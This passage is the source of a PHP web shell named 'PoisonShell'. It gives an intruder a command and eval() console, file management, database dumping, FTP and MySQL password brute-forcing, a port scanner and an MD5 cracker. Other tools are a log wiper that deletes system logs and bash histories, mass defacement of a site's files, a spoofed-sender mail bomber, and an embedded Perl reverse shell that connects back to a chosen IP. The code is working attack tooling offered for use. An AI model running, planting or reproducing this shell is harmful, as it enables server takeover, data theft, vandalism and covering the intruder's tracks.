alert('Session created');"; } else { echo ""; } } function creditos() { echo "



"; // ventana termina echo "
-- == (C) Doddy Hackman 2012 || Contact : lepuke[at]hotmail[com] || Web : doddyhackman.webcindario.com == --
"; exit(1); } if (isset($_GET['bajardb'])) { $tod = @mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password']); mysql_select_db($_GET['bajardb']); $resultado = mysql_query("SHOW TABLES FROM " . $_GET['bajardb']); while ($tabla = mysql_fetch_row($resultado)) { foreach($tabla as $indice => $valor) { $todo.= "

" . $valor . "

"; $resultadox = mysql_query("SELECT * FROM " . $valor); $todo.= ""; for ($i = 0;$i < mysql_num_fields($resultadox);$i++) { $todo.= ""; } while ($dat = mysql_fetch_row($resultadox)) { $todo.= ""; foreach($dat as $val) { $todo.= ""; } } $todo.= "
" . mysql_field_name($resultadox, $i) . "
" . $val . "
"; } } @mysql_free_result($tod); @header("Content-type: application/vnd-ms-excel; charset=iso-8859-1"); @header("Content-Disposition: attachment; filename=" . date('d-m-Y') . ".xls"); echo $todo; exit(1); } if (isset($_GET['bajartabla'])) { $tod = mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password']) or die("

Error

"); mysql_select_db($_GET['condb']); if (!empty($_GET['sentencia'])) { $resultado = mysql_query($_GET['sentencia']); } else { $resultado = mysql_query("SELECT * FROM " . $_GET['bajartabla']); } $todo.= ""; for ($i = 0;$i < mysql_num_fields($resultado);$i++) { $todo.= ""; } while ($dat = mysql_fetch_row($resultado)) { $todo.= ""; foreach($dat as $val) { $todo.= ""; } } @mysql_free_result($tod); $todo.= "
" . mysql_field_name($resultado, $i) . "
" . $val . "
"; @header("Content-type: application/vnd-ms-excel; charset=iso-8859-1"); @header("Content-Disposition: attachment; filename=" . date('d-m-Y') . ".xls"); echo $todo; exit(1); } if (isset($_GET['reload'])) { $tipo = pathinfo($_GET['reload']); echo ''; creditos(); } function dame($file) { return substr(sprintf('%o', fileperms($file)), -4); } if (isset($_GET['down'])) { header("Content-Type: application/octet-stream"); header("Content-Disposition: attachment; filename=" . basename($_GET['down'])); readfile($_GET['down']); exit(0); } if (isset($_POST['cookienew'])) { if (setcookie($_POST['cookienew'], $_POST['valor'])) { echo ""; echo ''; } else { echo ""; } } echo ''; echo "" . $_SERVER["SERVER_NAME"] . " - PoisonShell"; $verdad = php_uname('s') . php_uname('r'); $link = "http://www.exploit-db.com/search/?action=search&filter_page=1&filter_description=" . $verdad . "&filter_exploit_text=&filter_author=&filter_platform=0&filter_type=0&filter_lang_id=0&filter_port=&filter_osvdb=&filter_cve="; echo "

   PoisonShell   


System : " . $verdad . " " . " " . php_uname('v') . "
Server : " . $_SERVER['SERVER_SOFTWARE'] . "
"; if (file_exists("C:/WINDOWS/repair/sam")) { echo "File Found : SAM    "; } if (file_exists("/etc/passwd")) { echo "File Found : /etc/passwd    "; } echo "IP : " . $_SERVER['SERVER_ADDR'] . "       User : uid=" . getmyuid() . " (" . get_current_user() . ") gid=" . getmygid() . "    Path : " . getcwd() . "    Version PHP : " . phpversion() . "
"; if (ini_get('safe_mode') == 0) { echo "Safe Mode : OFF      "; } else { echo "Safe Mode : ON      "; } if (get_magic_quotes_gpc() == "1" or get_magic_quotes_gpc() == "on") { echo "Magic Quotes : ON      "; } else { echo "Magic Quotes : OFF      "; } exec("perl -h", $perl); if ($perl) { echo "Perl : ON      "; } else { echo "Perl : OFF      "; } exec("wget --help", $wget); if ($wget) { echo "WGET : ON      "; } else { echo "WGET : OFF      "; } exec("curl_version", $curl); if ($curl) { echo "CURL : ON      "; } else { echo "CURL : OFF      "; } echo "

"; echo "
NavigateCMD UploadBase64 Evalphpinfo MailerCrackers ProxyWeb PortScanEncodes MD5Cracker BackShellMassDefacement CleanLogsFTP SQLCookies Session DestroyMe


"; echo "

"; //ventana inicia //and count($_POST) == 0 if (count($_GET) == 0) { echo <<<_HTML_
                                           
                                           
                 ¾¾¾¾¾¾¾¾¾¾¾               
             ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾           
           ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾          
         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾         
         ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾        
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾       
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾       
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾       
       ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
        ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾      
        ¾¾¾¾¾¾¾  ¾¾¾¾¾¾¾¾¾¾¾    ¾¾¾¾       
         ¾¾¾¾       ¾¾¾¾¾¾      ¾¾¾¾       
          ¾¾¾      ¾¾¾ ¾¾¾      ¾¾¾        
          ¾¾¾¾¾¾¾¾¾¾¾   ¾¾¾   ¾¾¾¾         
           ¾¾¾¾¾¾¾¾¾     ¾¾¾¾¾¾¾¾¾         
           ¾¾¾¾¾¾¾¾¾  ¾  ¾¾¾¾¾¾¾¾¾         
           ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾         
                ¾¾¾¾¾¾¾¾¾¾¾¾¾              
              ¾  ¾¾¾¾¾¾¾¾¾¾  ¾             
              ¾    ¾ ¾¾¾¾ ¾  ¾             
              ¾ ¾¾          ¾¾             
     ¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾¾             
    ¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾     
    ¾¾¾¾¾¾¾      ¾¾¾¾¾¾¾¾¾¾¾      ¾¾¾¾¾¾   
    ¾¾¾¾¾¾¾¾¾¾      ¾¾¾         ¾¾¾¾¾¾¾¾¾  
     ¾¾¾  ¾¾¾¾¾¾             ¾¾¾¾¾¾¾¾¾¾¾   
              ¾¾¾¾¾¾     ¾¾¾¾¾¾¾           
                 ¾¾¾¾¾¾¾¾¾¾¾¾              
                  ¾¾¾¾¾¾¾¾¾                
               ¾¾¾¾¾¾¾ ¾¾¾¾¾¾¾             
           ¾¾¾¾¾¾¾         ¾¾¾¾¾¾¾         
       ¾¾¾¾¾¾¾                ¾¾¾¾¾¾¾¾¾¾   
  ¾¾¾¾¾¾¾¾                       ¾¾¾¾¾¾¾¾  
  ¾¾¾¾¾¾                           ¾¾¾¾¾¾  
   ¾¾¾¾                             ¾¾¾¾   
                                           
                                           
                                           
_HTML_; } if (isset($_GET['cracker'])) { echo "

Multi Cracker


Host :
User :
Wordlist :
Service :




"; if (isset($_POST['passnow'])) { $open = fopen($_POST['passnow'], "r"); echo "

"; echo "
[+] Starting the crack

"; if ($_POST['services'] == "FTP") { echo "[+] Service : FTP

"; while (!feof($open)) { $word = fgets($open, 255); $linea = chop($word); if ($enter = ftp_connect($_POST['host'])) { if ($dentro = ftp_login($enter, $_POST['user'], $linea)) { echo "[+] User : " . $_POST['user'] . "
"; echo "[+] Pass : " . $linea . "
"; fclose($open); ftp_close($enter); echo "

[+] Scan Finished

"; creditos(); } } } echo "

[+] Scan Finished

"; } if ($_POST['services'] == "MYSQL") { echo "[+] Service : MYSQL

"; while (!feof($open)) { $word = fgets($open, 255); $linea = chop($word); if (mysql_connect($_POST['host'], $_POST['user'], $linea)) { echo "[+] User : " . $_POST['user'] . "
"; echo "[+] Pass : " . $linea . "
"; fclose($open); mysql_close(); echo "

[+] Scan Finished

"; creditos(); } } echo "

[+] Scan Finished

"; } } } if (!empty($_GET['hostar'])) { @set_time_limit(5); echo "

PortScan



"; echo "
"; echo "[+] Target : " . $_GET['hostar'] . "
"; echo "[+] Scan to : " . $_GET['start'] . "-" . $_GET['end'] . "

"; for ($i = $_GET['start'];$i < $_GET['end'];$i++) { $re = @fsockopen($_GET['hostar'], $i, $errno, $errstr, 1); if ($re) { echo "[+] Port Found : " . $i . "
"; } } echo "

[+] Scan Finished

"; echo "
"; } if (isset($_GET['port'])) { echo "

ScanPort



"; echo "
Host :
Port Start :
Port End :


"; } if (isset($_GET['proxy'])) { echo "

Simple ProxyWeb



"; echo "
"; echo "Web : "; echo "
"; $code = @file_get_contents($_GET['proxy']); if ($code) { echo "

" . $code . "

"; } } if (isset($_GET['md5'])) { echo "
Text :
"; } if (isset($_POST['tex'])) { echo "

Result

"; if ($_POST['optionsa'] == "MD5") { echo md5($_POST['tex']); } if ($_POST['optionsa'] == "SHA1") { echo sha1($_POST['tex']); } if ($_POST['optionsa'] == "CRC32") { printf("%u\n", crc32($_POST['tex'])); } echo "
"; } if (isset($_GET['perms'])) { echo "
File :
Perms :

"; } if (isset($_POST['cambiarperms'])) { if (chmod($_POST['archivo'], $_POST['perms'])) { echo ""; } else { echo ""; } echo "

Atras

"; } if (isset($_GET['ren'])) { echo "
File :
Change to :


"; } if (isset($_POST['cambios'])) { if (@rename($_POST['nombre'], $_POST['cambio'])) { echo ""; } else { echo ""; } echo "

Atras

"; } if (isset($_POST['crear1'])) { chdir($_POST['dir']); if (fopen($_POST['crear1'], "w")) { echo ""; } else { echo ""; } } if (isset($_POST['crear2'])) { chdir($_POST['dir']); if (@mkdir($_POST['crear2'], 777)) { echo ""; } else { echo ""; } } if (isset($_GET['copiar'])) { echo '
File :
Copy to :


'; } if (isset($_POST['copiado'])) { if (copy($_POST['archivo'], $_POST['nuevo'])) { echo ""; } else { echo ""; } echo "

Atras

"; } if (isset($_GET['open'])) { echo "
"; echo "
"; echo "
"; echo "



"; echo "
"; } if (isset($_POST['modificar'])) { $modi = fopen($_GET['open'], 'w+'); if ($yeah = fwrite($modi, $_POST['code'])) { echo ""; } else { echo ""; } echo "

Atras

"; } if (isset($_POST['options'])) { $files = $_POST['valor']; if ($_POST['options'] == "Delete") { foreach($files as $file) { if (filetype($file) == "dir") { @rmdir($file); } else { @unlink($file); } } echo ''; echo ""; } if ($_POST['options'] == "Download") { foreach($files as $file) { echo ''; exit(0); } } if ($_POST['options'] == "Copy") { echo "
"; foreach($files as $file) { echo 'Name : To :
'; } echo "

"; echo "
"; exit(0); } if ($_POST['options'] == "Move") { echo "
"; foreach($files as $file) { echo 'Name : To :
'; } echo "

"; echo "
"; creditos(); } } if (isset($_POST['rutax'])) { $tengo = count($_POST['rutax']); for ($i = 0;$i <= $tengo;$i++) { @copy($_POST['rutax'][$i], $_POST['cambiax'][$i]); } echo ""; } if (isset($_POST['mirameboludo'])) { $tengo = count($_POST['rutas']); for ($i = 0;$i <= $tengo;$i++) { @rename($_POST['rutas'][$i], $_POST['cambiar'][$i]); } echo ""; } if (isset($_GET['dir'])) { if ($_GET['dir'] == "") { $path = getcwd(); @chdir($path); $dir = @dir($path); } else { $path = $_GET['dir']; @chdir($path); $dir = @dir($path); } $scans = range("B", "Z"); echo "Detect Drives : "; foreach($scans as $drive) { $drive = $drive . ":\\"; if (is_dir($drive)) { echo "  " . "" . $drive . ""; } } echo "

Directory :


New File :
New Directory :


"; $archivos = array('dir' => array(), 'file' => array()); while ($archivo = $dir->read()) { $ver = @filetype($path . '/' . $archivo); if ($ver == "dir") { $archivos['dir'][] = $path . '/' . $archivo; } else { $archivos['file'][] = $path . '/' . $archivo; } } $dir->rewind(); if (count($archivos['dir']) == 0 and count($archivos['file'] == 0)) { echo ""; echo "Error"; } echo "




"; } if (isset($_GET['upload'])) { echo "

Upload files




"; echo '
File :

Directory :
'; if (isset($_FILES['archivo'])) { $subimos = basename($_FILES['archivo']['name']); if (move_uploaded_file($_FILES['archivo']['tmp_name'], $subimos)) { if (copy($subimos, $_POST['destino'] . "/" . $subimos)) { unlink($subimos); echo ""; } } else { echo ""; } } } if (isset($_GET['base64'])) { echo '

Base64 encode/decoder


Encode :
Decode :
'; } if (isset($_POST['codificar'])) { echo "
"; echo "

Text

" . $_POST['code'] . "


Result

"; echo base64_encode($_POST['code']); echo "


"; } if (isset($_POST['decodificar'])) { echo "


Text

" . $_POST['decode'] . "


Result

"; echo base64_decode($_POST['decode']); echo "


"; } if (isset($_GET['phpconsole'])) { echo '

Function eval()


Code :
'; } if (isset($_POST['cargar'])) { echo "

Code

" . $_POST['codigo'] . "


Result

"; eval($_POST['codigo']); echo "
"; } if (isset($_GET['logs'])) { echo '

Zapper





'; } if (isset($_GET['clean'])) { $paths = array("/var/log/lastlog", "/var/log/telnetd", "/var/run/utmp", "/var/log/secure", "/root/.ksh_history", "/root/.bash_history", "/root/.bash_logut", "/var/log/wtmp", "/etc/wtmp", "/var/run/utmp", "/etc/utmp", "/var/log", "/var/adm", "/var/apache/log", "/var/apache/logs", "/usr/local/apache/logs", "/usr/local/apache/logs", "/var/log/acct", "/var/log/xferlog", "/var/log/messages/", "/var/log/proftpd/xferlog.legacy", "/var/log/proftpd.xferlog", "/var/log/proftpd.access_log", "/var/log/httpd/error_log", "/var/log/httpsd/ssl_log", "/var/log/httpsd/ssl.access_log", "/etc/mail/access", "/var/log/qmail", "/var/log/smtpd", "/var/log/samba", "/var/log/samba.log.%m", "/var/lock/samba", "/root/.Xauthority", "/var/log/poplog", "/var/log/news.all", "/var/log/spooler", "/var/log/news", "/var/log/news/news", "/var/log/news/news.all", "/var/log/news/news.crit", "/var/log/news/news.err", "/var/log/news/news.notice", "/var/log/news/suck.err", "/var/log/news/suck.notice", "/var/spool/tmp", "/var/spool/errors", "/var/spool/logs", "/var/spool/locks", "/usr/local/www/logs/thttpd_log", "/var/log/thttpd_log", "/var/log/ncftpd/misclog.txt", "/var/log/nctfpd.errs", "/var/log/auth"); echo "

OutPut

"; $comandos = array('find / -name *.bash_history -exec rm -rf {} \;', 'find / -name *.bash_logout -exec rm -rf {} \;', 'find / -name log* -exec rm -rf {} \;', 'find / -name *.log -exec rm -rf {} \;', 'unset HISTFILE', 'unset SAVEHIST'); echo "
"; foreach($paths as $path) { if (@unlink($path)) { echo $path . ": Deleted
"; } } echo "

"; foreach($comandos as $comando) { echo "Loading command : " . $comando . "
"; system($comando); } echo "
"; } if (isset($_GET['mass'])) { echo "

MassDefacement



Directory to start :

Code :
"; } function juntar($dira, $text) { $dir = opendir($dira); while (!is_bool($archivos = readdir($dir))) { if ($archivos != "..") { if ($archivos != ".") { if ($archivos != basename($_SERVER['PHP_SELF'])) { if (@filetype($dira . "/" . $archivos) == dir) { juntar($dira . "/" . $archivos, $text); } else { echo "
"; echo "Deface : " . $dira . "/" . $archivos . "
"; $solo = fopen($dira . "\\" . $archivos, "w"); $solo = fwrite($solo, $text); fclose($solo); echo "
"; } } } } } } if (isset($_POST['def'])) { echo "

OutPut



"; juntar($_POST['dir'], $_POST['codigo']); } if (isset($_GET['chau'])) { if ($_GET['chau'] == "fuckit") { echo "

Kapoom !!!



"; unlink(basename($_SERVER['PHP_SELF'])); //descomentar para usar esta funcion } else { echo "

Acceso Denegado



"; } } if (isset($_GET['bomber'])) { echo "

Mail Bomber



Target :       
FakeMail :       
FakeName :       
ListMails :       
Subjects :       
Count :       
Body :       


"; } if (isset($_POST['bombers'])) { $need.= "MIME-Version: 1.0\n"; $need.= "Content-type: text/html ; charset=iso-8859-1\n"; $need.= "MIME-Version: 1.0\n"; $need.= "From: " . $_POST['nombrefalso'] . " <" . $_POST['falso'] . ">\n"; $need.= "To: " . $_POST['nombrefalso'] . "<" . $_POST['falso'] . ">\n"; $need.= "Reply-To:" . $_POST['falso'] . "\n"; $need.= "X-Priority: 1\n"; $need.= "X-MSMail-Priority:Hight\n"; $need.= "X-Mailer:Widgets.com Server"; echo "


Result



"; for ($i = 1;$i <= $_POST['count'];$i++) { if ($_POST['listamails'] != "None") { $open = fopen($_POST['listamails'], "r"); while (!feof($open)) { $word = fgets($open, 255); $word = chop($word); if (@mail($word, $_POST['asunto'], $_POST['mensaje'], $need)) { echo "[+] Message $i to " . $word . " Send
"; flush(); } else { echo "[+] Message $i to " . $word . " Not Send
"; } } } else { if (@mail($_POST['idiot'], $_POST['asunto'], $_POST['mensaje'], $need)) { echo "[+] Message $i to " . $_POST['idiot'] . " Send
"; flush(); } else { echo "[+] Message $i to " . $_POST['idiot'] . " Not Send
"; } } } echo "
"; } if (isset($_GET['md5crack'])) { echo "

MD5 Cracker



Hash :
Salt :
Wordlist :


"; } if (isset($_POST['md5'])) { $open = fopen($_POST['listmd5'], "r"); echo "

"; echo "
[+] Starting the search

"; while (!feof($open)) { $word = fgets($open, 255); $linea = chop($word); if (!empty($_POST['salto'])) { $test = md5($linea . $_POST['salto']); } else { $test = md5($linea); } if ($test == $_POST['md5']) { echo "
[+] Hash Cracked : " . $_POST['md5'] . ":" . $linea . "

"; creditos(); } else { echo "[+] : " . $_POST['md5'] . " != " . $linea . "
"; } } echo "
[+] Finished
"; echo "
"; } if (isset($_GET['cookiemanager'])) { echo "

Cookies



"; echo "[+] Cookies Found : " . count($_COOKIE) . "

"; echo "

New cookie :
Value :





"; echo ""; echo ""; if (count($_COOKIE) != 0) { foreach($_COOKIE as $nombre => $valor) { echo ""; } echo "
NameValue
" . $nombre . "" . $valor . "
"; } echo "

"; } if (isset($_GET['sessionmanager'])) { @session_start(); echo "

Session



"; echo "[+] Sessions Found : " . count($_SESSION) . "

"; echo "

New session :
Value :





"; if (count($_SESSION) != 0) { echo ""; echo ""; foreach($_SESSION as $nombre => $valor) { echo ""; } echo "
NameValue
" . $nombre . "" . $valor . "
"; } } if (isset($_GET['ftp'])) { echo "

FTP Manager


"; echo "
Server :
User :
Pass :



"; } if (isset($_GET['serverftp'])) { if ($enter = @ftp_connect($_GET['serverftp'])) { if ($dentro = @ftp_login($enter, $_GET['user'], $_GET['pass'])) { echo "
[+] Connected to server
"; } else { echo "
[-] Error in the login

"; creditos(); } echo "[+] ONline


"; echo "
Directory :


New directory :




"; if (isset($_GET['diar'])) { $enter = @ftp_connect($_GET['serverftp']); $dentro = @ftp_login($enter, $_GET['user'], $_GET['pass']); if (empty($_GET['diar'])) { if (!$lista = ftp_nlist($enter . ".")) { echo ""; creditos(); } } else { if (!$lista = ftp_nlist($enter, $_GET['diar'])) { echo ""; creditos(); } } } echo "
"; echo " "; echo ""; echo ""; foreach($lista as $ver) { if (ftp_size($enter, ftp_pwd($enter) . $ver) == - 1) { echo ""; echo ""; echo ""; echo ""; } else { echo ""; echo ""; echo ""; echo ""; } } if (isset($_POST['furia'])) { $files = $_POST['vax']; $enter = ftp_connect($_POST['serverftp']); $dentro = ftp_login($enter, $_POST['user'], $_POST['pass']); foreach($files as $file) { if (ftp_delete($enter, ftp_pwd($enter) . "/" . $file)) { } else { ftp_rmdir($enter, ftp_pwd($enter) . "/" . $file); } } echo ""; } echo "
NameTypeAction
$verDirectory
" . $ver . "File
"; echo "

Options :   
"; } else { echo "[-] Error in the server

"; } } if (isset($_GET['newdirftp'])) { $enter = ftp_connect($_GET['serverftp']); $dentro = ftp_login($enter, $_GET['user'], $_GET['pass']); if (ftp_mkdir($enter, $_GET['diar'] . $_GET['newdirftp'])) { echo ""; echo 'alert('Error');"; } } if (isset($_GET['backshell'])) { echo "

BackShell



IP :
Port :
Type :


"; } if (isset($_GET['ipar'])) { if ($_GET['tipo'] == "Perl") { $code = ' #!usr/bin/perl #Reverse Shell 0.2 #Coded By Doddy H #Command : nc -lvvp 666 use IO::Socket; print "\n== -- Reverse Shell 0.2 - Doddy H 2012 -- ==\n\n"; unless ( @ARGV == 2 ) { print "[Sintax] : $0 \n\n"; exit(1); } else { print "[+] Starting the connection\n"; print "[+] Enter in the system\n"; print "[+] Enjoy !!!\n\n"; conectar( $ARGV[0], $ARGV[1] ); tipo(); } sub conectar { socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname("tcp") ); connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) ); open( STDIN, ">&REVERSE" ); open( STDOUT, ">&REVERSE" ); open( STDERR, ">&REVERSE" ); } sub tipo { print "\n[+] Reverse Shell Starting...\n\n"; if ( $^O =~ /Win32/ig ) { infowin(); system("cmd.exe"); } else { infolinux(); system("export TERM=xterm;exec sh -i"); } } sub infowin { print "[+] Domain Name : " . Win32::DomainName() . "\n"; print "[+] OS Version : " . Win32::GetOSName() . "\n"; print "[+] Username : " . Win32::LoginName() . "\n\n\n"; } sub infolinux { print "[+] System information\n\n"; system("uname -a"); print "\n\n"; } #The End ? '; echo "

OutPut

"; $de = $_SERVER["HTTP_USER_AGENT"]; if (eregi("Win", $de)) { if ($test = fopen("back.pl", "w")) { echo "

[+] Shell Created
"; } else { echo "

[-] Error creating the shell
"; } } else { if ($test = fopen("/tmp/back.pl", "w")) { echo "

[+] Shell Created
"; } else { echo "

[-] Error creating the shell
"; } } if (fwrite($test, $code)) { if (eregi("Win", $de)) { if (chmod("back.pl", 0777)) { echo "[+] Perms Changed
"; } else { echo "[-] Not priviligies to changed permissions
"; } echo "[+] Loading Shell


"; echo "

"; echo "
"; if (!system("perl back.pl " . $_GET['ipar'] . " " . $_GET['portar'])) { echo ""; } echo "
"; } else { if (chmod("/tmp/back.pl", 0777)) { echo "[+] Perms Changed
"; } else { echo "[-] Not priviligies to changed permissions
"; } echo "[+] Loading Shell


"; echo "

"; echo "
"; if (!system("cd /tmp;perl back.pl " . $_GET['ipar'] . " " . $_GET['portar'])) { echo ""; } echo "
"; } } else { echo "
[-] Error writing in the shell

"; } } echo "

"; } if (isset($_GET['sql'])) { echo "

SQL Manager


Server :
User :
Pass :

"; } if (isset($_GET['entersql'])) { if ($mysql = @mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password'])) { if ($databases = @mysql_list_dbs($mysql)) { echo "

Databases Found


"; echo ""; while ($dat = @mysql_fetch_row($databases)) { foreach($dat as $indice => $valor) { echo ""; } } echo "
$valorEnterDownload
"; } else { echo ""; creditos(); } } else { echo ""; creditos(); } } if (isset($_GET['enterdb'])) { $mysql = mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password']); mysql_select_db($_GET['enterdb']); echo "
"; $tablas = mysql_query("show tables from " . $_GET['enterdb']) or die("error"); echo "

Tables Found



"; while ($tabla = mysql_fetch_row($tablas)) { foreach($tabla as $indice => $valor) { echo ""; } } echo "
$valorEnterDownload
"; } if (isset($_GET['entertable'])) { $mysql = mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password']); mysql_select_db($_GET['condb']); echo "

SQL Manager



Consulta SQL :







"; $conexion = mysql_connect($_GET['host'], $_GET['usuario'], $_GET['password']) or die("

Error

"); mysql_select_db($_GET['condb']); if (isset($_POST['mostrar'])) { if (!empty($_POST['sentencia'])) { $resultado = mysql_query($_POST['sentencia']); } else { $resultado = mysql_query("SELECT * FROM " . $_GET['entertable']); } $numer = 0; echo ""; for ($i = 0;$i < mysql_num_fields($resultado);$i++) { echo ""; $numer++; } while ($dat = mysql_fetch_row($resultado)) { echo ""; foreach($dat as $val) { echo ""; } } echo "
" . mysql_field_name($resultado, $i) . "
" . $val . "
"; } } creditos(); } else { echo "
Username :
Password :

"; } // The End ? ?>